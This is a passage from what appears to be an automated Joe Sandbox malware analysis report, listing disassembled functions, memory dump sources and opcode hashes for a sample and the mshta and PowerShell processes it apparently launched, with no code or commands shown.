                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981734296.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981734296.00007FF640523000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981825972.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff6404e0000_rename_me_before.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: ErrorFileLastWrite
                                                                                                                                                                                                                                                            • String ID: U
                                                                                                                                                                                                                                                            • API String ID: 442123175-4171548499
                                                                                                                                                                                                                                                            • Opcode ID: 8a697203ccd77e4b09c13c65c1c26094ec0dd1f28ad5eedaecdf6916cad97550
                                                                                                                                                                                                                                                            • Instruction ID: 8b8d4b9416c589f260b880531aaf5e651441b8178d234a713b01115a6015ebe5
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8a697203ccd77e4b09c13c65c1c26094ec0dd1f28ad5eedaecdf6916cad97550
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F041B122A1CAA5D6EB20EF65E8443AA6765FB88794F804131EE4DC7788DF3CD441CB40
                                                                                                                                                                                                                                                            Function 00007FF6404FE8C8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1981599946.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981561933.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981666255.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981734296.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981734296.00007FF640523000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981825972.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff6404e0000_rename_me_before.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: CurrentDirectory
                                                                                                                                                                                                                                                            • String ID: :
                                                                                                                                                                                                                                                            • API String ID: 1611563598-336475711
                                                                                                                                                                                                                                                            • Opcode ID: e37c33f8f2befd5fbd3c49cdc0b6d52123385b6fd944ea7372e41dd3f6ca63dc
                                                                                                                                                                                                                                                            • Instruction ID: 265fd425774259fe4c10bacb84e146b6f2c0bc7eed03276dbc83b9e05cfd5995
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e37c33f8f2befd5fbd3c49cdc0b6d52123385b6fd944ea7372e41dd3f6ca63dc
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D621D572B0C691D1EB64BB16D04467E73A6FB84B84F854035DA8C83384CFBCDA45C751
                                                                                                                                                                                                                                                            Function 00007FF6404EF068 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1981599946.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981561933.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981666255.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981734296.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981734296.00007FF640523000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981825972.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff6404e0000_rename_me_before.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: ExceptionFileHeaderRaise
                                                                                                                                                                                                                                                            • String ID: csm
                                                                                                                                                                                                                                                            • API String ID: 2573137834-1018135373
                                                                                                                                                                                                                                                            • Opcode ID: 353d784395b77eefcba7ec404c7e4e47dbaba59ece92a9373595b893a828088a
                                                                                                                                                                                                                                                            • Instruction ID: d5508817ca1574cb3cdebf1fea9f4d7507e4a5c8921daac632a5552b477f6921
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 353d784395b77eefcba7ec404c7e4e47dbaba59ece92a9373595b893a828088a
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0E11793660CB8182EB21AB14E440269B7E0FB88B88F188230DA8C47769DF3CC5518B00
                                                                                                                                                                                                                                                            Function 00007FF6404FFA4C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1981599946.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981561933.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981666255.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981734296.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981734296.00007FF640523000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981825972.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff6404e0000_rename_me_before.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: DriveType_invalid_parameter_noinfo
                                                                                                                                                                                                                                                            • String ID: :
                                                                                                                                                                                                                                                            • API String ID: 2595371189-336475711
                                                                                                                                                                                                                                                            • Opcode ID: 229dc5225c97c31120184e1c5c073253f760aebc87e6502baf4f3d3b6f3e4c47
                                                                                                                                                                                                                                                            • Instruction ID: 512d6b907b4660450709611d994324b7190bfa6b4bc0ead6391dc0269b747c2a
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 229dc5225c97c31120184e1c5c073253f760aebc87e6502baf4f3d3b6f3e4c47
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F9017822E1C666E6FB24BFA0A46127E22A5EF88708F840036D94DC6791DE6CE544DB24

                                                                                                                                                                                                                                                            Executed Functions

                                                                                                                                                                                                                                                            Function 000001C8D01E0FC1 Relevance: .0, Instructions: 5COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000011.00000003.1747910857.000001C8D01E0000.00000010.00000800.00020000.00000000.sdmp, Offset: 000001C8D01E0000, based on PE: false
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_17_3_1c8d01e0000_mshta.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                            • Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                                                                                                                                                                                                            • Instruction ID: 54069ac30771ea864ddeefd9aa68e8ae767faa2823c41204e24d9df813676b9c
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: EF9002144D540756E82511D10C857AC50406388290FD44881842790184D94D42E71252

                                                                                                                                                                                                                                                            Executed Functions

                                                                                                                                                                                                                                                            Function 00007FFD99E21699 Relevance: .8, Instructions: 803COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000045.00000002.1849742865.00007FFD99E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E20000, based on PE: false
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_69_2_7ffd99e20000_powershell.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                            • Opcode ID: 6ad4d78e4fa94dfce23fa149def52c40d4fc51ff778e8ef1aada9d4071988f1e
                                                                                                                                                                                                                                                            • Instruction ID: 86aa231d421a5eb1e41d94dc12d54f99defd370b4857c666f9c3e3c4312d7002
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6ad4d78e4fa94dfce23fa149def52c40d4fc51ff778e8ef1aada9d4071988f1e
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AF324722B0EB894FEB669F7848A55B87BE1EF86214B1901FBD04DC70D3D91AAD45C342
                                                                                                                                                                                                                                                            Function 00007FFD99D549FB Relevance: .2, Instructions: 199COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000045.00000002.1849365710.00007FFD99D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99D50000, based on PE: false
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_69_2_7ffd99d50000_powershell.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                            • Opcode ID: e36c176a56bbe8896a761cfa65291c9da860123b2786c0f2736c1c9b5e88e105
                                                                                                                                                                                                                                                            • Instruction ID: 796a173e6998201c2345bedc70b10fe2591cbd776d56417c4b1d0ccdd9e671d2
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e36c176a56bbe8896a761cfa65291c9da860123b2786c0f2736c1c9b5e88e105
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A4517431E18A088FDB58EFA8D4956ADBBF1FF59314F10406DD40DD7296CE35A842CB42
                                                                                                                                                                                                                                                            Function 00007FFD99D53945 Relevance: .0, Instructions: 49COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000045.00000002.1849365710.00007FFD99D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99D50000, based on PE: false
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_69_2_7ffd99d50000_powershell.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                            • Opcode ID: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                                                                                                                                                                                                                            • Instruction ID: b13a88b549bebaafe024d3b201b8d4f4eeb421777b31f8c969d1f3422b1165e9
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8B01A77020CB0C8FD744EF0CE451AA5B3E0FF85324F50052DE58AC3695D632E881CB42